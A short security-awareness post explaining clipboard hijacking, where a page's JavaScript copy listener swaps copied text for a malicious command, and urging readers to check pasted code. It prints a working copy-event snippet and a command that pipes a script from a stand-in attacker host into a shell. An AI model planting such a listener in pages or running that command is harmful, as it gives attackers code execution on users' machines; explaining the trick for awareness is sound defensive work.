Let’s say you come across a website with a helpful command, so you copy this to paste into a console/terminal to save some time typing it out. Smart move, right?
Well, no, probably not. Visit this website and copy the sudo apt update text and then paste it into the box below on that site. It will instead paste: curl http://attacker-domain:8000/shell.sh | sh and then immediately add a new line, which will automatically perform the command.
How this works is a JavaScript event listener captures the copy event and then replaces the clipboard data with the malicious code, as below:
<script>
document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl http://attacker-domain:8000/shell.sh | sh\n'); e.preventDefault(); });
</script>
In conclusion, always be careful when copying code that you find online. When in doubt, paste it into Notepad or your URL bar first to confirm it is not malicious.